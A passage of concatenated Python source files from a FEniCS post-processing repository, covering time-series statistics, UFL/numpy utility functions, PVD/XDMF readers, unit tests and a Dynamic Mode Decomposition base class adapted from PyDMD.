        # the mean squared, to be used for computing the RMS
        mvs.pointwiseMult(mvs, mvs)
        # now, compute the STD
        # for this, follow the example of RMS
        std = self
        # NOTE: for efficiency we stay away from Interpreter and all is in PETSc layer
        x = as_backend_type(std.vector()).vec()  # PETSc.Vec, stores the final output
        x.zeroEntries()
        y = x.copy()  # Stores the current working field
        # Integrate
        dts = np.diff(series.times)
        f_vectors = [as_backend_type(f.vector()).vec() for f in series.nodes]
        for dt, (f0, f1) in zip(dts, zip(f_vectors[:-1], f_vectors[1:])):
            y.pointwiseMult(f0, f0)  # y = f0**2
            x.axpy(dt / 2., y)  # x += dt / 2 * y
            y.pointwiseMult(f1, f1)  # y = f1**2
            x.axpy(dt / 2., y)  # x += dt / 2 * y
            x.axpy(-dt, mvs)  # x += -dt * mvs NOTE: no factor 2, as adding 2 dt / 2 to compensate
        # Time interval scaling
        x /= dts.sum()
        # sqrt
        x.sqrtabs()
        return self
def SlidingWindowFilter(Filter, width, series):
    '''
    Collapse a series into a different (shorter) series obtained by applying
    filter to the chunks of series of given width.
    '''
    assert width > 0
    # deque with maxlen drops from the left once full -> a sliding window
    t_buffer, f_buffer = deque(maxlen=width), deque(maxlen=width)
    series = interpreter.Eval(series)
    times = series.times
    nodes = series.nodes
    filtered_ft_pairs = []
    for t, f in zip(times, nodes):
        t_buffer.append(t)
        f_buffer.append(f)
        # Once the deque is full it will 'overflow' from right so then
        # we have the right view to filter
        if len(f_buffer) == width:
            ff = Filter(timeseries.TempSeries(zip(list(f_buffer), list(t_buffer))))
            # NOTE: Python 2 integer division picks the window midpoint stamp
            tf = list(t_buffer)[width/2]  # Okay for odd
            filtered_ft_pairs.append((ff, tf))
    return timeseries.TempSeries(filtered_ft_pairs)
|
MiroK/fenics-cacl | xcalc/utils.py | from dolfin import Function, FunctionSpace, VectorElement, TensorElement
from itertools import imap, izip, dropwhile, ifilterfalse, ifilter
from ufl.indexed import Index, FixedIndex, MultiIndex
from ufl.core.terminal import Terminal
def make_function(V, coefs):
    '''Build a Function in V whose dof vector holds coefs.'''
    # FIXME: parallel (set_local only sets the process-local values)
    result = Function(V)
    result.vector().set_local(coefs)
    return result
def coefs_of(f):
    '''Dof values of a Function; plain numbers pass through unchanged.'''
    # We arrive here either with a function or a number
    if not isinstance(f, Function):
        assert isinstance(f, (int, float)), (f, type(f))
        return f
    return f.vector().get_local()
def space_of(foos):
    '''Extract the function space for representing foos'''
    # We arrive here either with a function or a number
    elm, mesh = None, None
    for f in filter(lambda x: isinstance(x, Function), foos):
        elm_ = f.function_space().ufl_element()
        mesh_ = f.function_space().mesh()
        # First function fixes element and mesh; the rest must match
        if elm is None:
            elm = elm_
            mesh = mesh_
        else:
            assert elm_ == elm and mesh.id() == mesh_.id()
    return FunctionSpace(mesh, elm)
def numpy_op_indices(V):
    '''Iterator over dofs of V in a logical way'''
    # next(numpy_op_indices(V)) gets indices for accessing coef of function in V
    # in a way that after reshaping the values can be used by numpy
    nsubs = V.num_sub_spaces()
    # Get will give us e.g matrix to go with det to set the value of det
    if nsubs:
        # Zip component dofmaps so each item collects the component dofs
        # belonging to one (vector/tensor valued) point
        indices = imap(list, izip(*[iter(V.sub(comp).dofmap().dofs()) for comp in range(nsubs)]))
    else:
        indices = iter(V.dofmap().dofs())
    return indices
def common_sub_element(spaces):
    '''V for space which are tensor products of V otherwise fail'''
    found = None
    for space in spaces:
        candidate = component_element(space)
        # First space sets the reference element; the rest must agree
        assert found is None or found == candidate
        found = candidate
    # All is well
    return found
def component_element(elm):
    '''If the space/FE has a structure V x V ... x V find V'''
    # Type convert
    if isinstance(elm, FunctionSpace):
        return component_element(elm.ufl_element())
    # Single component
    if not elm.sub_elements():
        return elm
    # V x V x V ... => V
    # NOTE: the unpacking also asserts all subelements are identical
    V_, = set(elm.sub_elements())
    return V_
def shape_representation(shape, elm):
    '''How to reshape expression of shape represented in FE space with elm'''
    celm = component_element(elm)
    # Scalar is a base
    if not celm.value_shape():
        return shape
    # Can't represent vector with matrix space
    eshape = celm.value_shape()
    assert len(shape) >= len(eshape)
    # Vec with vec requires no reshaping
    if shape == eshape:
        return ()
    # Compatibility
    assert shape[-len(eshape):] == eshape
    # So (2, 2) with (2, ) is (2, )
    # NOTE(review): shape[:len(eshape)] and shape[:-len(eshape)] coincide for
    # the supported ranks (<= 2); confirm before extending to higher ranks
    return shape[:len(eshape)]
def make_space(V, shape, mesh):
    '''Tensor product space of right shape'''
    # Dispatch by how many axes must be added on top of V's own value shape
    finite_elements = [lambda x, shape: x,
                       lambda x, shape: VectorElement(x, dim=shape[0]),
                       lambda x, shape: TensorElement(x, shape=shape)]
    # FEM upscales; cant upscale larger
    assert len(shape) - len(V.value_shape()) >= 0
    # No tensor
    assert len(shape) <= 2
    fe_glue = finite_elements[len(shape) - len(V.value_shape())]
    elm = fe_glue(V, shape)
    return FunctionSpace(mesh, elm)
def numpy_op_foo(args, op, shape_res):
    '''Construct function with shape_res ufl_shape by applying op to args'''
    # Do we have V x V x ... spaces?
    sub_elm = common_sub_element([space_of((arg, )) for arg in args])
    get_args = []
    # Construct iterators for accesing the coef values of arguments in the
    # right way be used with numpy op
    for arg in args:
        arg_coefs = coefs_of(arg)
        V = arg.function_space()
        shape = shape_representation(arg.ufl_shape, V.ufl_element())
        # How to access coefficients by indices
        indices = numpy_op_indices(V)
        # Get values for op by reshaping
        if shape:
            get = imap(lambda i, c=arg_coefs, s=shape: c[i].reshape(s), indices)
        else:
            get = imap(lambda i, c=arg_coefs: c[i], indices)
        get_args.append(get)
    # Now all the arguments can be iterated to gether by
    args = izip(*get_args)
    # Construct the result space
    # NOTE: V here is the space of the last argument; all args share the mesh
    V_res = make_space(sub_elm, shape_res, V.mesh())
    # How to reshape the result and assign
    if shape_representation(shape_res, V_res.ufl_element()):
        dofs = imap(list, numpy_op_indices(V_res))
        reshape = lambda x: x.flatten()
    else:
        dofs = numpy_op_indices(V_res)
        reshape = lambda x: x
    # Fill coefs of the result expression
    coefs_res = Function(V_res).vector().get_local()
    for dof, dof_args in izip(dofs, args):
        coefs_res[dof] = reshape(op(*dof_args))
    # NOTE: make_function so that there is only one place (hopefully)
    # where parallelism needs to be addressed
    return make_function(V_res, coefs_res)
# Utils for series
def find_first(things, predicate):
    '''Index of first item in container which satisfies the predicate'''
    for index, item in enumerate(things):
        if predicate(item):
            return index
    # Mirror next() exhausting an iterator when nothing matches
    raise StopIteration
def find_last(things, predicate):
    '''Counting things backward the index of the first item satisfying the predicate'''
    # Scan from the right; offset k from the end maps to negative index -k-1
    for offset, item in enumerate(reversed(things)):
        if predicate(item):
            return -offset - 1
    # Mirror next() exhausting an iterator when nothing matches
    raise StopIteration
def clip_index(array, first, last):
    '''Every item x in array[clip_index(...)] satisfied first < x < last'''
    assert first < last
    # Strict inequalities: items equal to first/last are excluded
    f = find_first(array, lambda x, f=first: x > f)
    l = find_last(array, lambda x, l=last: x < l) + 1
    return slice(f, l)
# UFL utils for substitution of indices
def is_index(expr):
    '''Is expr a (free or fixed) UFL index?'''
    return isinstance(expr, Index) or isinstance(expr, FixedIndex)
def traverse_indices(expr):
    '''Traverse the UFL expression (drilling into indices)'''
    # Recurse into operands, yielding only index nodes
    if expr.ufl_operands:
        for op in expr.ufl_operands:
            for e in ifilter(is_index, traverse_indices(op)):
                yield e
    # Multiindex has no operands but we want the indices
    if isinstance(expr, MultiIndex):
        for i in expr.indices():
            yield i
def matches(expr, target):
    '''Compare two indices for equality'''
    return expr == target
def contains(expr, target):
    '''Is the target index contained in the expression?'''
    # A terminal target either agrees or is one of the expr terminals
    if is_index(expr):
        return expr == target
    else:
        return any(matches(target, t) for t in traverse_indices(expr))
def replace(expr, arg, replacement):
    '''A new expression where argument in the expression is the replacement'''
    # Do nothing if no way to substitute, i.e. return original
    if not contains(expr, arg):
        return expr
    # Identical
    if matches(expr, arg):
        return replacement
    # Reconstruct the node with the substituted argument (recursing down)
    if expr.ufl_operands:
        return type(expr)(*[replace(op, arg, replacement) for op in expr.ufl_operands])
    # This has to be MultiIndex
    return MultiIndex(tuple(replace(op, arg, replacement) for op in expr.indices()))
|
MiroK/fenics-cacl | xcalc/timeseries.py | import xml.etree.ElementTree as ET
from function_read import (read_h5_function, read_vtu_function,
read_h5_mesh, read_vtu_mesh)
from dolfin import (Function, XDMFFile, HDF5File, FunctionSpace,
VectorFunctionSpace, TensorFunctionSpace, warning)
from ufl.corealg.traversal import traverse_unique_terminals
from utils import space_of, clip_index
import interpreter
import numpy as np
import itertools
import os
class TempSeries(Function):
    '''
    Collection of snapshots that are when Eval are functions in same
    space V. That is, series are lazy in general. UFL nodes are supported
    over series with logic op([s], [t]) = [op(s, t)].
    '''
    def __init__(self, ft_pairs):
        # NOTE: this is derived from Function just to allow nice
        # interplay with the interpreter. If there were space time
        # elements then we could have eval f(t, x) support
        nodes, times = list(zip(*ft_pairs))
        # Checks some necessary conditions for compatibility of nodes in the series
        assert check_nodes(nodes)
        # Optimistically take the function space
        V = interpreter.Eval(next(iter(nodes))).function_space()
        # Time interval check: time stamps must be strictly increasing
        dt = np.diff(times)
        assert (dt > 0).all()
        self.nodes = nodes    # snapshots (possibly still lazy UFL nodes)
        self.times = times    # matching, strictly increasing time stamps
        self.V = V            # function space shared by the snapshots
        Function.__init__(self, V)
    def __iter__(self):
        '''Iterate nodes in the series'''
        # op(series) = series(op(functions))
        for f in self.nodes: yield f
    def __len__(self):
        return len(self.nodes)
    def getitem(self, index):
        '''Access elements of the time series'''
        # NOTE: a named method (not __getitem__) because Function already
        # uses indexing for UFL component access
        if isinstance(index, int):
            return self.nodes[index]
        else:
            return TempSeries(zip(self.nodes[index], self.times[index]))
def stream(series, f):
    '''Pipe series through Function f'''
    # Generator: each yield rebinds f's coefficients to the next snapshot
    series = interpreter.Eval(series)
    # f must live in a compatible space: same element and same mesh
    assert series.V.ufl_element() == f.function_space().ufl_element()
    assert series.V.mesh().id() == f.function_space().mesh().id()
    for f_ in series:  # Get your own iterator
        f.vector().set_local(f_.vector().get_local())
        yield f
def clip(series, t0, t1):
    '''A view of the series with times such that t0 < times < t1'''
    # Strict inequalities are enforced by clip_index
    window = clip_index(series.times, t0, t1)
    return TempSeries(zip(series.nodes[window], series.times[window]))
def common_interval(series):
    '''Series are compatible if they have same intervals'''
    series = filter(lambda s: isinstance(s, TempSeries), series)
    interval = []
    for s in series:
        interval_ = np.array(s.times)
        # Every series must carry (numerically) identical time stamps
        assert not len(interval) or np.linalg.norm(interval - interval_) < 1E-14
        interval = interval_
    return interval
def check_nodes(series):
    '''
    Nodes in the series are said to be compatible here iff
    1) they are over the same mesh
    2) they have the same base element
    3) they have the same shape
    '''
    # NOTE: each `x, = set(...)` unpacking below raises ValueError unless the
    # property is unique across the series - that IS the check; the function
    # returns True only if all of them pass
    shape, = set(f.ufl_shape for f in series)
    terminal_functions = lambda s=series: (
        itertools.ifilter(lambda f: isinstance(f, Function),
                          itertools.chain(*map(traverse_unique_terminals, s)))
    )
    # Base element
    family, = set(f.ufl_element().family() for f in terminal_functions())
    degree, = set(f.ufl_element().degree() for f in terminal_functions())
    # Mesh
    mesh_id, = set(f.function_space().mesh().id() for f in terminal_functions())
    return True
def get_P1_space(V):
    '''Get the Lagrange CG1 space corresponding to V'''
    # This is how in essence FEniCS 2017.2.0 dumps data, i.e. there is
    # no support for higher order spaces
    assert V.ufl_element().family() != 'Discontinuous Lagrange'  # Cell data needed

    mesh = V.mesh()
    rank = len(V.ufl_element().value_shape())
    # Scalar, vector or tensor CG1 depending on the value rank
    constructors = (FunctionSpace, VectorFunctionSpace, TensorFunctionSpace)
    return constructors[min(rank, 2)](mesh, 'CG', 1)
def PVDTempSeries(path, V=None, first=0, last=None):
    '''
    Read in the temp series of functions in V from PVD file. If V is not
    a function space then a finite element has to be provided for constructing
    the space on the recovered mesh.
    '''
    _, ext = os.path.splitext(path)
    assert ext == '.pvd'
    tree = ET.parse(path)
    collection = list(tree.getroot())[0]
    # Resolve VTU paths relative to the PVD's directory
    path = os.path.dirname(os.path.abspath(path))
    # Read in paths/timestamps for VTUs. NOTE: as thus is supposed to be serial
    # assert part 0
    vtus, times = [], []
    for dataset in collection:
        assert dataset.attrib['part'] == '0'
        vtus.append(os.path.join(path, dataset.attrib['file']))
        times.append(float(dataset.attrib['timestep']))
    # Keep only the requested range of snapshots
    vtus, times = vtus[slice(first, last, None)], times[slice(first, last, None)]
    # path.vtu -> function. But vertex values!!!!
    if not isinstance(V, FunctionSpace):
        warning('Setting up P1 space on the recovered mesh')
        cell_type = V.cell()  # Dangerously assuming this is a UFL element
        mesh = read_vtu_mesh(vtus[0], cell_type)
        V = FunctionSpace(mesh, V)
    # Stored data are vertex values, so only a P1 representation makes sense
    V = get_P1_space(V)
    functions = read_vtu_function(vtus, V)
    ft_pairs = zip(functions, times)
    return TempSeries(ft_pairs)
def XDMFTempSeries(path, V, first=0, last=None):
    '''
    Read in the temp series of functions in V from XDMF file. If V is not
    a function space then a finite element has to be provided for constructing
    the space on the recovered mesh.

    :param path: path to a ``.xdmf`` file (with an accompanying HDF5 file)
    :param V: FunctionSpace, or a UFL element used to build one on the
        mesh recovered from the HDF5 file
    :param first: index of the first snapshot to load
    :param last: index one past the last snapshot to load (None = all)
    :returns: TempSeries of CG1 functions paired with their timestamps
    '''
    # NOTE: in 2017.2.0 fenics only stores vertex values so CG1 functions
    # is what we go for
    _, ext = os.path.splitext(path)
    assert ext == '.xdmf'
    # XDMF layout: root -> Domain -> Grid -> per-timestep items
    tree = ET.parse(path)
    domain = list(tree.getroot())[0]
    grid = list(domain)[0]
    times = []  # Only collect time stamps so that we access in right order
    h5_file = ''  # Consistency of piece as VisualisationVector ...
    for item in grid:
        # Each item holds (topology, geometry, time, attribute) children;
        # only the time stamp and the attribute's data location are needed
        _, __, time, attrib = list(item)
        time = time.attrib['Value']
        times.append(time)
        # Attribute data is addressed as "<h5 file>:/<dataset path>";
        # all pieces must point into the same HDF5 file
        piece = list(attrib)[0]
        h5_file_, fdata = piece.text.split(':/')
        assert not h5_file or h5_file == h5_file_
        h5_file = h5_file_
    times = times[slice(first, last, None)]
    # We read visualization vector from this
    h5_file = os.path.join(os.path.dirname(os.path.abspath(path)), h5_file)
    if not isinstance(V, FunctionSpace):
        warning('Setting up P1 space on the recovered mesh')
        cell_type = V.cell()  # Dangerously assuming this is a UFL element
        mesh = read_h5_mesh(h5_file, cell_type)
        V = FunctionSpace(mesh, V)
    # Only vertex values are stored, so read into the CG1 image of V
    V = get_P1_space(V)
    functions = read_h5_function(h5_file, times, V)
    ft_pairs = zip(functions, map(float, times))
    return TempSeries(ft_pairs)
|
MiroK/fenics-cacl | xcalc/__init__.py | <reponame>MiroK/fenics-cacl<filename>xcalc/__init__.py
from interpreter import Eval
|
MiroK/fenics-cacl | test/test_timeseries.py | <gh_stars>1-10
from xcalc.interpreter import Eval
from xcalc.timeseries import TempSeries, stream, clip
from itertools import izip
from dolfin import *
import numpy as np
import unittest
def error(true, me):
    """Return the L2 distance between `me` and `true` over me's mesh."""
    domain = me.function_space().mesh()
    diff = me - true
    l2_squared = assemble(inner(diff, diff) * dx(domain=domain))
    return sqrt(abs(l2_squared))
class TestCases(unittest.TestCase):
    '''UnitTest for (some of) xcalc.timeseries'''

    def test_fail_on_times(self):
        # Timestamps must be increasing
        mesh = UnitSquareMesh(2, 2)
        V = FunctionSpace(mesh, 'DG', 0)
        ft_pairs = ((Function(V), 0), (Function(V), -2))
        with self.assertRaises(AssertionError):
            TempSeries(ft_pairs)

    def test_fail_on_spaces(self):
        # Different element and degree in series
        mesh = UnitSquareMesh(2, 2)
        V = FunctionSpace(mesh, 'DG', 0)
        W = FunctionSpace(mesh, 'CG', 1)
        ft_pairs = ((Function(V), 0), (Function(W), 1))
        with self.assertRaises(ValueError):
            TempSeries(ft_pairs)

    def test_algebra_fail_different_times(self):
        # Series with mismatched timestamps cannot be combined
        mesh = UnitSquareMesh(2, 2)
        V = FunctionSpace(mesh, 'DG', 0)
        series0 = TempSeries(((Function(V), 0), (Function(V), 1)))
        series1 = TempSeries(((Function(V), 0), (Function(V), 2)))
        with self.assertRaises(AssertionError):
            Eval(series0 - series1)

    def test_algebra_fail_different_spaces(self):
        # Series over different spaces cannot be combined
        mesh = UnitSquareMesh(2, 2)
        V = FunctionSpace(mesh, 'DG', 0)
        W = FunctionSpace(mesh, 'CG', 1)
        series0 = TempSeries(((Function(V), 0), (Function(V), 1)))
        series1 = TempSeries(((Function(W), 0), (Function(W), 1)))
        with self.assertRaises(AssertionError):
            Eval(series0 - series1)

    def test_algebra(self):
        mesh = UnitSquareMesh(2, 2)
        V = FunctionSpace(mesh, 'DG', 0)
        series0 = TempSeries([(interpolate(Constant(1), V), 0),
                              (interpolate(Constant(2), V), 1)])
        series1 = TempSeries([(interpolate(Constant(2), V), 0),
                              (interpolate(Constant(3), V), 1)])
        series01 = Eval(series1 - series0)
        self.assertTrue(np.linalg.norm(series01.times - np.array([0, 1])) < 1E-14)
        # Now each should be 1
        for f in series01:
            self.assertTrue(error(Constant(1), f) < 1E-14)

    def test_vec_mag(self):
        mesh = UnitSquareMesh(2, 2)
        V = VectorFunctionSpace(mesh, 'CG', 1)
        series = TempSeries([(interpolate(Expression(('x[0]', '0'), degree=1), V), 0),
                             (interpolate(Expression(('0', 'x[1]'), degree=1), V), 1)])
        mag_series = Eval(sqrt(inner(series, series)))
        self.assertTrue(error(Expression('x[0]', degree=1), mag_series.getitem(0)) < 1E-14)
        self.assertTrue(error(Expression('x[1]', degree=1), mag_series.getitem(1)) < 1E-14)

    def test_steam(self):
        mesh = UnitSquareMesh(2, 2)
        V = FunctionSpace(mesh, 'DG', 0)
        series0 = TempSeries([(interpolate(Constant(1), V), 0),
                              (interpolate(Constant(2), V), 1)])
        v = Function(V)
        stream_series = stream(2*series0, v)
        # NOTE: it is crucial that this is lazy. With normal zip
        # v in all the pairse has the last value
        for vi, v in izip(series0, stream_series):
            self.assertTrue(error(2*vi, v) < 1E-14)
        for i, v in enumerate(stream_series):
            self.assertTrue(error(2*series0.getitem(i), v) < 1E-14)

    def test_clip(self):
        mesh = UnitSquareMesh(2, 2)
        V = FunctionSpace(mesh, 'DG', 0)
        series = TempSeries([(interpolate(Constant(1), V), 0),
                             (interpolate(Constant(2), V), 1),
                             (interpolate(Constant(3), V), 2),
                             (interpolate(Constant(4), V), 3)])
        clipped_series = clip(series, 0, 3)
        # BUG FIX: was `self.assertTrue(len(clipped_series)) == 2` -- the
        # `== 2` comparison sat outside the assertion and was never checked.
        self.assertEqual(len(clipped_series), 2)
        self.assertEqual(clipped_series.times, (1, 2))
        self.assertTrue(error(Constant(2), clipped_series.getitem(0)) < 1E-14)
        self.assertTrue(error(Constant(3), clipped_series.getitem(1)) < 1E-14)

    def test_get(self):
        mesh = UnitSquareMesh(2, 2)
        V = VectorFunctionSpace(mesh, 'CG', 1)
        series = TempSeries([(interpolate(Expression(('x[0]', '0'), degree=1), V), 0),
                             (interpolate(Expression(('0', 'x[1]'), degree=1), V), 1)])
        mag_series = Eval(series[0])  # series of first componentsts
        self.assertTrue(error(Expression('x[0]', degree=1), mag_series.getitem(0)) < 1E-14)
        self.assertTrue(error(Expression('0', degree=1), mag_series.getitem(1)) < 1E-14)
        mag_series = Eval(series[1])  # series of secon componentsts
        self.assertTrue(error(Expression('0', degree=1), mag_series.getitem(0)) < 1E-14)
        self.assertTrue(error(Expression('x[1]', degree=1), mag_series.getitem(1)) < 1E-14)

    def test_algebra_harder(self):
        mesh = UnitSquareMesh(2, 2)
        V = FunctionSpace(mesh, 'DG', 0)
        series0 = TempSeries([(interpolate(Constant(2), V), 0),
                              (interpolate(Constant(3), V), 1)])
        series1 = TempSeries([(interpolate(Constant(4), V), 0),
                              (interpolate(Constant(5), V), 1)])
        series01 = Eval(series1**2 - 2*series0)
        self.assertTrue(np.linalg.norm(series01.times - np.array([0, 1])) < 1E-14)
        # 4^2 - 2*2 = 12 at t=0, 5^2 - 2*3 = 19 at t=1
        for f, true in zip(series01, (Constant(12), Constant(19))):
            self.assertTrue(error(true, f) < 1E-14)
|
MiroK/fenics-cacl | xcalc/dmdbase.py | # This code is taken from PyDMD https://github.com/mathLab/PyDMD
# It is included here for the sake of simplifying the installation
# on UiO machines
from __future__ import division
from os.path import splitext
from builtins import range
from builtins import object
from past.utils import old_div
import numpy as np
class DMDBase(object):
    """
    Dynamic Mode Decomposition base class.

    :param int svd_rank: rank truncation in SVD. If 0, the method computes the
        optimal rank and uses it for truncation; if positive number, the method
        uses the argument for the truncation; if -1, the method does not
        compute truncation.
    :param int tlsq_rank: rank truncation computing Total Least Square. Default
        is 0, that means no truncation.
    :param bool exact: flag to compute either exact DMD or projected DMD.
        Default is False.
    :param bool opt: flag to compute optimized DMD. Default is False.
    :cvar dict original_time: dictionary that contains information about the
        time window where the system is sampled:
        - `t0` is the time of the first input snapshot;
        - `tend` is the time of the last input snapshot;
        - `dt` is the delta time between the snapshots.
    :cvar dict dmd_time: dictionary that contains information about the time
        window where the system is reconstructed:
        - `t0` is the time of the first approximated solution;
        - `tend` is the time of the last approximated solution;
        - `dt` is the delta time between the approximated solutions.
    """

    def __init__(self, svd_rank=0, tlsq_rank=0, exact=False, opt=False):
        self.svd_rank = svd_rank
        self.tlsq_rank = tlsq_rank
        self.exact = exact
        self.opt = opt
        self.original_time = None
        self.dmd_time = None
        self._eigs = None
        self._Atilde = None
        self._modes = None  # Phi
        self._b = None  # amplitudes
        self._snapshots = None
        self._snapshots_shape = None

    @property
    def dmd_timesteps(self):
        """
        Get the timesteps of the reconstructed states.

        :return: the time intervals of the original snapshots.
        :rtype: numpy.ndarray
        """
        return np.arange(self.dmd_time['t0'],
                         self.dmd_time['tend'] + self.dmd_time['dt'],
                         self.dmd_time['dt'])

    @property
    def original_timesteps(self):
        """
        Get the timesteps of the original snapshot.

        :return: the time intervals of the original snapshots.
        :rtype: numpy.ndarray
        """
        return np.arange(self.original_time['t0'],
                         self.original_time['tend'] + self.original_time['dt'],
                         self.original_time['dt'])

    @property
    def modes(self):
        """
        Get the matrix containing the DMD modes, stored by column.

        :return: the matrix containing the DMD modes.
        :rtype: numpy.ndarray
        """
        return self._modes

    @property
    def atilde(self):
        """
        Get the reduced Koopman operator A, called A tilde.

        :return: the reduced Koopman operator A.
        :rtype: numpy.ndarray
        """
        return self._Atilde

    @property
    def eigs(self):
        """
        Get the eigenvalues of A tilde.

        :return: the eigenvalues from the eigendecomposition of `atilde`.
        :rtype: numpy.ndarray
        """
        return self._eigs

    @property
    def dynamics(self):
        """
        Get the time evolution of each mode.

        :return: the matrix that contains all the time evolution, stored by
            row.
        :rtype: numpy.ndarray
        """
        # MODERNIZATION: replaced the python-2 compat shim `old_div(a, b)`
        # with true division, which is exactly what old_div evaluates to
        # for float/complex arrays.
        omega = np.log(self.eigs) / self.original_time['dt']
        vander = np.exp(np.multiply(*np.meshgrid(omega, self.dmd_timesteps)))
        return (vander * self._b).T

    @property
    def reconstructed_data(self):
        """
        Get the reconstructed data.

        :return: the matrix that contains the reconstructed snapshots.
        :rtype: numpy.ndarray
        """
        return self.modes.dot(self.dynamics)

    @property
    def snapshots(self):
        """
        Get the original input data.

        :return: the matrix that contains the original snapshots.
        :rtype: numpy.ndarray
        """
        return self._snapshots

    def fit(self, X):
        """
        Abstract method to fit the snapshots matrices.

        Not implemented, it has to be implemented in subclasses.
        """
        raise NotImplementedError(
            'Subclass must implement abstract method {}.fit'.format(
                self.__class__.__name__))

    @staticmethod
    def _col_major_2darray(X):
        """
        Private method that takes as input the snapshots and stores them into a
        2D matrix, by column. If the input data is already formatted as 2D
        array, the method saves it, otherwise it also saves the original
        snapshots shape and reshapes the snapshots.

        :param X: the input snapshots.
        :type X: int or numpy.ndarray
        :return: the 2D matrix that contains the flatten snapshots, the shape
            of original snapshots.
        :rtype: numpy.ndarray, tuple
        """
        # If the data is already 2D ndarray
        if isinstance(X, np.ndarray) and X.ndim == 2:
            return X, None
        input_shapes = [np.asarray(x).shape for x in X]
        # BUG FIX: was `is not 1` -- identity comparison with an int literal
        # relies on CPython interning and is a SyntaxWarning on 3.8+.
        if len(set(input_shapes)) != 1:
            raise ValueError('Snapshots have not the same dimension.')
        snapshots_shape = input_shapes[0]
        snapshots = np.transpose([np.asarray(x).flatten() for x in X])
        return snapshots, snapshots_shape

    @staticmethod
    def _compute_tlsq(X, Y, tlsq_rank):
        """
        Compute Total Least Square.

        :param numpy.ndarray X: the first matrix;
        :param numpy.ndarray Y: the second matrix;
        :param int tlsq_rank: the rank for the truncation; If 0, the method
            does not compute any noise reduction; if positive number, the
            method uses the argument for the SVD truncation used in the TLSQ
            method.
        :return: the denoised matrix X, the denoised matrix Y
        :rtype: numpy.ndarray, numpy.ndarray

        References:
        https://arxiv.org/pdf/1703.11004.pdf
        https://arxiv.org/pdf/1502.03854.pdf
        """
        # Do not perform tlsq.  BUG FIX: was `is 0` (identity comparison).
        if tlsq_rank == 0:
            return X, Y
        V = np.linalg.svd(np.append(X, Y, axis=0), full_matrices=False)[-1]
        rank = min(tlsq_rank, V.shape[0])
        VV = V[:rank, :].conj().T.dot(V[:rank, :])
        return X.dot(VV), Y.dot(VV)

    @staticmethod
    def _compute_svd(X, svd_rank):
        """
        Truncated Singular Value Decomposition.

        :param numpy.ndarray X: the matrix to decompose.
        :param svd_rank: the rank for the truncation; If 0, the method computes
            the optimal rank and uses it for truncation; if positive interger,
            the method uses the argument for the truncation; if float between 0
            and 1, the rank is the number of the biggest singular values that
            are needed to reach the 'energy' specified by `svd_rank`; if -1,
            the method does not compute truncation.
        :type svd_rank: int or float
        :return: the truncated left-singular vectors matrix, the truncated
            singular values array, the truncated right-singular vectors matrix.
        :rtype: numpy.ndarray, numpy.ndarray, numpy.ndarray

        References:
        Gavish, Matan, and <NAME>, The optimal hard threshold for
        singular values is, IEEE Transactions on Information Theory 60.8
        (2014): 5040-5053.
        """
        U, s, V = np.linalg.svd(X, full_matrices=False)
        V = V.conj().T
        # BUG FIX: was `svd_rank is 0` (identity comparison with a literal).
        if svd_rank == 0:
            # Optimal hard threshold (Gavish & Donoho, 2014)
            omega = lambda x: 0.56 * x**3 - 0.95 * x**2 + 1.82 * x + 1.43
            beta = np.divide(*sorted(X.shape))
            tau = np.median(s) * omega(beta)
            rank = np.sum(s > tau)
        elif svd_rank > 0 and svd_rank < 1:
            cumulative_energy = np.cumsum(s / s.sum())
            rank = np.searchsorted(cumulative_energy, svd_rank) + 1
        elif svd_rank >= 1 and isinstance(svd_rank, int):
            rank = min(svd_rank, U.shape[1])
        else:
            rank = X.shape[1]
        U = U[:, :rank]
        V = V[:, :rank]
        s = s[:rank]
        return U, s, V

    @staticmethod
    def _build_lowrank_op(U, s, V, Y):
        """
        Private method that computes the lowrank operator from the singular
        value decomposition of matrix X and the matrix Y.

        .. math::
            \\mathbf{\\tilde{A}} =
            \\mathbf{U}^* \\mathbf{Y} \\mathbf{X}^\\dagger \\mathbf{U} =
            \\mathbf{U}^* \\mathbf{Y} \\mathbf{V} \\mathbf{S}^{-1}

        :param numpy.ndarray U: 2D matrix that contains the left-singular
            vectors of X, stored by column.
        :param numpy.ndarray s: 1D array that contains the singular values of X.
        :param numpy.ndarray V: 2D matrix that contains the right-singular
            vectors of X, stored by row.
        :param numpy.ndarray Y: input matrix Y.
        :return: the lowrank operator
        :rtype: numpy.ndarray
        """
        return U.T.conj().dot(Y).dot(V) * np.reciprocal(s)

    @staticmethod
    def _eig_from_lowrank_op(Atilde, Y, U, s, V, exact):
        """
        Private method that computes eigenvalues and eigenvectors of the
        high-dimensional operator from the low-dimensional operator and the
        input matrix.

        :param numpy.ndarray Atilde: the lowrank operator.
        :param numpy.ndarray Y: input matrix Y.
        :param numpy.ndarray U: 2D matrix that contains the left-singular
            vectors of X, stored by column.
        :param numpy.ndarray s: 1D array that contains the singular values of X.
        :param numpy.ndarray V: 2D matrix that contains the right-singular
            vectors of X, stored by row.
        :param bool exact: if True, the exact modes are computed; otherwise,
            the projected ones are computed.
        :return: eigenvalues, eigenvectors
        :rtype: numpy.ndarray, numpy.ndarray
        """
        lowrank_eigenvalues, lowrank_eigenvectors = np.linalg.eig(Atilde)
        # Compute the eigenvectors of the high-dimensional operator
        if exact:
            eigenvectors = ((
                Y.dot(V) * np.reciprocal(s)).dot(lowrank_eigenvectors))
        else:
            eigenvectors = U.dot(lowrank_eigenvectors)
        # The eigenvalues are the same
        eigenvalues = lowrank_eigenvalues
        return eigenvalues, eigenvectors

    @staticmethod
    def _compute_amplitudes(modes, snapshots, eigs, opt):
        """
        Compute the amplitude coefficients. If `opt` is False the amplitudes
        are computed by minimizing the error between the modes and the first
        snapshot; if `opt` is True the amplitudes are computed by minimizing
        the error between the modes and all the snapshots, at the expense of
        bigger computational cost.

        :param numpy.ndarray modes: 2D matrix that contains the modes, stored
            by column.
        :param numpy.ndarray snapshots: 2D matrix that contains the original
            snapshots, stored by column.
        :param numpy.ndarray eigs: array that contains the eigenvalues of the
            linear operator.
        :param bool opt: flag for optimized dmd.
        :return: the amplitudes array
        :rtype: numpy.ndarray
        """
        # rcond=None selects the new (machine-precision based) default and
        # silences the numpy FutureWarning the bare call used to emit.
        if opt:
            L = np.concatenate(
                [
                    modes.dot(np.diag(eigs**i))
                    for i in range(snapshots.shape[1])
                ],
                axis=0)
            b = np.reshape(snapshots, (-1, ), order='F')
            a = np.linalg.lstsq(L, b, rcond=None)[0]
        else:
            a = np.linalg.lstsq(modes, snapshots.T[0], rcond=None)[0]
        return a
class DMD(DMDBase):
    """
    Dynamic Mode Decomposition

    :param svd_rank: the rank for the truncation; If 0, the method computes the
        optimal rank and uses it for truncation; if positive interger, the
